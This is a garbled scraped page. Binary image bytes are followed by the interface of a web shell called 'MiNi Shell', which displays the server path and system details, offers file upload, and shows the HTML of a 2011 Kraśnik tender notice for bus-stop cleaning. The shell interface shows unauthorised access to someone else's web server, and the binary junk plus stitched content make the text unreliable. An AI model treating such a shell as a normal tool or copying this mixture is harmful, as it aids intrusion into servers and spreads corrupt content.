JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111207/322623-N-2011.html

<p class="kh_header"><b>Kraśnik: Sprzątanie przystanków i dzierżawa wiat przystankowych na terenie miasta Kraśnik</b><br>
<b>Numer ogłoszenia: 322623 - 2011; data zamieszczenia: 07.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie przystanków i dzierżawa wiat przystankowych na terenie miasta Kraśnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa sprzątania przystanków i dzierżawa wiat przystankowych w granicach administracyjnych miasta Kraśnik.
1.	Ilość przystanków przeznaczonych do sprzątania i utrzymania zimowego - 57 szt. 
w tym:
1)	Przystanki I kategorii oznaczone symbolem A - 2 szt. - sprzątanie 3 razy 
w tygodniu (1 - z niedzieli na poniedziałek, 2 - ze środy na czwartek, 3 - z piątku na sobotę) przystanków kategorii I tj.: wiat, terenu wokół wiat i chodników na długości zatok oraz opróżniania koszy.

Wykaz przystanków I kategorii:
Lp.	Nazwa Przystanku	Opis miejsca	Kierunek jazdy	Symbol przystanku
1.	Dzielnica Fabryczna Główny		ul. Mickiewicza,
ul. Krasińskiego	A 6
2.	ul. Narutowicza	TAXI	ul. Urzędowska,
     ul. Kościuszki	A 23

2)	Przystanki II kategorii oznaczone symbolem B - 29 szt. sprzątanie3 - razy w tygodniu  (1 - z niedzieli na poniedziałek i 2 - ze środy na czwartek, 3 - z piątku na sobotę) wiata oraz teren wokół wiaty - 2,0 m z trzech stron wokół wiaty oraz opróżniania koszy.



Wykaz przystanków II kategorii:
Lp.	Nazwa Przystanku	Opis miejsca	Kierunek jazdy	Symbol przystanku
1.		ul. Krasińskiego	Cmentarz	ul. Słowackiego	B 1
2.		ul. Racławicka		ul. Urzędowska,     
ul. Kościuszki	B 3
3.		ul. Krasińskiego		ul. Słowackiego	B 4
4.		ul. Krasińskiego		ul. Słowackiego	B 5
5.		ul. Mickiewicza		Al.  Niepodległości	B 7
6.		Al. Niepodległości	Szpital	ul. Racławicka	B 8
7.		Al. Niepodległości 13		ul. Urzędowska	B 9
8.		Al. Niepodległości	Targ	ul. Racławicka	B 10
9.		Skrzyżowanie FŁT		ul. Racławicka,            ul. Urzędowska	B 11
10.		Plac manewrowy 		ul. Racławicka,            ul. Urzędowska	B 12
11.		ul. Kolejowa 	Jednostka Wojskowa	ul. Lubelska	B 13
12.		ul. Kolejowa 	WOTEL	Dw. PKP	B 18
13.		ul. Lubelska	Urząd Miasta	ul. Urzędowska	B 21
14.		ul. Lubelska	Urząd Miasta	Dw. PKP	B 22
15.		ul. Piłsudskiego		ul. Strażacka	B 24
16.		ul. Piłsudskiego		ul. Kościuszki	B 25
17.		ul. Młyńska		ul. Piłsudskiego	B 26
18.		ul. Urzędowska	S.P. Nr 2	ul. Racławicka	B 29
19.		ul. Urzędowska	Koszary	ul. Racławicka	B 31
20.		ul. Urzędowska	Koszary	ul. Lubelska	B 32
21.		ul. Urzędowska	Piaski I	ul. Racławicka	B 33
22.		ul. Urzędowska	Piaski I	ul. Lubelska	B 34
23.		ul. Urzędowska	Piaski II	ul. Racławicka	B 35
24.		ul. Urzędowska	Piaski II	ul. Lubelska	B 36
25.		ul. Urzędowska	Budzyń	ul. Racławicka	B 37
26.		ul. Urzędowska	Budzyń	ul. Lubelska	B 38
27.		ul. Urzędowska	Marzenie	ul. Racławicka	B 39
28.		ul. Janowska	Kwiatkowice	Kraśnik	B 41
29.		ul. Oboźna	Park	Suchynia	B 52

3)	Przystanki III kategorii oznaczone symbolem C - 26 szt., sprzątanie 2 razy 
w tygodniu (1 - z wtorku na środę, 2- z piątku na sobotę) słupek oraz chodnik na długości 6,0 m z dwóch stron słupka oraz opróżnianie koszy.

Wykaz przystanków III kategorii:
Lp.	Nazwa Przystanku	Opis miejsca	Kierunek jazdy	Symbol przystanku
1.		ul. Gmeinera		ul. Graniczna	C 2
2.		ul. Kolejowa	Jednostka Wojskowa	Dw. PKP	C 14
3.		ul. Kolejowa 	Jawor	ul. Lubelska	C 15
4.		ul. Kolejowa 	Jawor	Dw. PKP	C 16
5.		ul. Kolejowa 	Wotel	ul. Lubelska	C 17
6.		ul. Lubelska	CPN	ul. Urzędowska	C 19
7.		ul. Lubelska	CPN	Dw. PKP	C 20
8.		ul. Kościuszki	Cmentarz	ul. Cegielniana	C 27
9.		ul. Cegielniana		ul. Cegielniana	C 28
10.		ul. Urzędowska	S.P. Nr 2	ul. Lubelska	C 30
11.		ul. Urzędowska	Marzenie	ul. Lubelska	C 40
12.		ul. Janowska	Kwiatkowice	Stróża	C 42
13.		ul. Janowska	Za rondem	Kraśnik	C 43
14.		ul. Janowska	Za rondem	Stróża	C 44
15.		ul. Strażacka 19	Łaźnia	ul. Narutowicza	C 45
16.		ul. Podleska 33	 	ul. Strażacka	C 46
17.		ul. Podleska 33	 	ul. Strażacka	C 47
18.		ul. Widerlika 10	 	ul. Zaklikowska	C 48
19.		ul. Widerlika 23a	 	ul. Zaklikowska	C 49
20.		ul. Oboźna 2	 	Suchynia	C 50
21.		ul. Oboźna 9	 	ul. Lubelska	C 51
22.		ul. Oboźna 	Park	ul. Lubelska	C 53
23.		ul. Oboźna 	D.P.S.	Suchynia	C 54
24.		ul. Suchyńska 13	 	ul. Oboźna	C 55
25.		ul. Suchyńska 31	 	ul. Oboźna	C 56
26.		ul. Jagiellońska	przy kwiaciarni	ul. Przechodnia	C57

Godziny sprzątania przystanków - do 5,00.
Przystanki powinny być sprzątnięte do czasu rozpoczęcia pracy komunikacji.

Rodzaje przystanków:
Przystanek autobusowy z zatoką - sprzątanie i utrzymanie zimowe dotyczy powierzchni na całej długości zatoki i szerokości chodnika.

Przystanek autobusowy z wydzielonym peronem - sprzątanie i utrzymanie zimowe dotyczy powierzchni na całej długości i szerokości peronu.

Przystanek autobusowy bez wydzielonego peronu - sprzątanie i utrzymanie zimowe dotyczy powierzchni na długości 6 metrów w jedną i drugą stronę od słupka przystankowego i na całej szerokości chodnika.

2. Zakres prac związanych z utrzymaniem w czystości przystanków komunikacji miejskiej:
1)	sprzątanie powierzchni przystanku (w przypadku przystanku wyposażonego w wiaty sprzątaniu podlega teren bezpośrednio z tyłu i boków wiaty o szerokości 2 metrów),
2)	bieżące opróżnianie koszy na odpady (średnia pojemność kosza 40 litrów), 
3)	usuwanie nielegalnych naklejek i ogłoszeń naklejonych na przystankach i urządzeniach przystankowych, za wyjątkiem ogłoszeń opatrzonych pieczątką Zarządcy przystanków,
4)	usuwanie i sprzątanie chwastów na całej powierzchni peronów przystanków autobusowych,
5)	usunięcie kurzu i zabrudzeń z ławek (w wiatach i stojących na przystankach),
6)	usuwanie szkła z powierzchni peronu oraz terenu bezpośrednio z tyłu i boków wiaty 
w sytuacjach uszkodzenia (wybicia) szyb w wiacie przystankowej.

3.  Zakres prac i zadań dodatkowych związanych z utrzymaniem zimowym przystanków:
1)	odśnieżanie i usuwanie oblodzenia, posypywanie piaskiem oraz wywóz śniegu odbywa się na bieżąco,
2)	usuwanie skutków gołoledzi na przystankach odbywa się na bieżąco,
3)	usuwanie nawisów lodowych z dachów i konstrukcji wiat przystankowych odbywa się na bieżąco,
4)	usunięcie skutków opadów śniegu lub gołoledzi na przystankach powinno nastąpić 
w czasie nie dłuższym niż 1 godzinę od ustania opadów śniegu lub gołoledzi, niezależnie od pory dnia i czy jest to dzień roboczy czy też wolny od pracy,
5)	ekipy utrzymujące w czystości przystanki w okresie zimowym, powinny pełnić stałe całodobowe dyżury codziennie, dotyczy to również niedziel i świąt, niezależnie od pory dnia,
6)	usunięcie piasku z powierzchni przystanków i peronów niezwłocznie po okresie zimowym,
7)	śnieg zalegający perony przystankowe powinien być zgarniany poza obręb przystanku w sposób nieutrudniający dostępu do przystanku, jak i wejścia i wyjścia z pojazdów,
8)	wywóz śniegu z powierzchni przystanków i zagospodarowanie we własnym zakresie.

4.  Utrzymanie w czystości urządzeń przystankowych:
1)	ilość urządzeń przystankowych - 31 szt. kategorii I i II,
2)	okres utrzymania w czystości - do 31 grudnia 2014 r.,
3)	częstotliwość - w okresie utrzymania w czystości każde urządzenie przystankowe jest myte i czyszczone dwa razy w roku  (I - do 30 kwietnia, II - do 31 października) 
w celu zachowania należytego poziomu estetyki,
4)	lokalizacja urządzeń przystankowych - wskazana jest w wykazie przystanków I i II kategorii niniejszej umowie.

5.  Zakres prac związanych z utrzymaniem w czystości urządzeń przystankowych:
1)	mycie i czyszczenie szyb wiaty, konstrukcji wiaty, dachu i sufitu wiaty, ławki 
i siedzenia, słupka i tablicy znaku przystankowego, gabloty reklamowej zewnątrz, kasety z rozkładami jazdy z zewnątrz,
2)	mycie dachu wiaty od wewnątrz i zewnątrz (dotyczy dachów wykonanych 
z poliwęglanu),
3)	usuwanie z szyb wiat przystankowych, naklejek i ogłoszeń wraz z usunięciem pozostałości kleju na szybach,
4)	bieżące udrażnianie odpływu wody z dachu wiat, rynien i rur spustowych (np. usuwanie liści, gałęzi, nieczystości),
5)	usuwanie graffiti z szyb, konstrukcji wiaty, ławek i siedzeń, dachu i sufitu wiaty, tablicy znaku przystankowego, gablot reklamowych, gablot przystankowych rozkładami jazdy - środki chemiczne stosowane do mycia wiat i usuwania graffiti z wiat nie mogą prowadzić do uszkodzeń powierzchni lakierniczych, powierzchni oszklonych oraz pokrytych poliwęglanem.

6. Zakres prac związanych z utrzymaniem w dobrym stanie technicznym urządzeń przystankowych:
1)	ilość urządzeń przystankowych - 31 szt. kategorii I i II,
2)	zapobieganie dewastacji i niszczeniu wiat, dokonywanie napraw (wymiana szyb, ławek  i innych elementów wiaty) , bieżąca konserwacja wiat (malowanie),
3)	w zamian za utrzymanie wiat przystankowych Wykonawca może wykorzystywać powierzchnie reklamowe wiat w celu umieszczania reklam i czerpania z tego tytułu pożytków.   
4)	Wykonawca będzie ponosił pełną odpowiedzialność za ewentualne szkody 
w przedmiocie dzierżawy wynikłe z jego winy, a w przypadku uszkodzeń lub zniszczeń jest zobowiązany do ich naprawienia i przywrócenia do stanu ujętego 
w protokole zdawczo - odbiorczym, 
5)	w przypadku nie naprawienia szkód  w wyznaczonym terminie Zamawiający wykona naprawy z własnych środków, a ich kosztem obciąży Wykonawcę, 
6)	zabrania się Wykonawcy bez zgody Zamawiającego czynić zmiany w przedmiocie dzierżawy.

7.  Kontrole czystości przystanków będą prowadzili pracownicy Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości 3 000 zł (słownie: trzy tysiące złotych), które może być wnoszone w:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
3)	poręczeniach i gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. z 2007r. Nr 42, poz. 275 z późn. zm.)
2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Polska Kasa Opieki S.A. nr 46 1240 5497 1111 0010 4019 7424. 
3.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium - przetarg na: Sprzątanie przystanków i dzierżawa wiat przystankowych na terenie miasta Kraśnik.
4.	Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
5.	Wadium musi być wniesione przed upływem terminu składania ofert, tj. do 15.12.2011 r. do godz. 13:00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego).
6.	Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
7.	Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z rozdziałem XII pkt 1 SIWZ - są wykluczeni.
8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
13.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14.	Wykonawca traci wadium na rzecz Zamawiającego, jeżeli:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia (zał. nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT zmianie ulega kwota wynagrodzenia netto, bez zmiany kwot brutto.
Przewiduje się zmianę umowy dot. przedmiotu zamówienia w przypadku zmiany lokalizacji przystanków oraz dostawienia wiaty przystankowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.krasnik.eu/index.php?id=39<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
pok. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 13:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 13.01.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com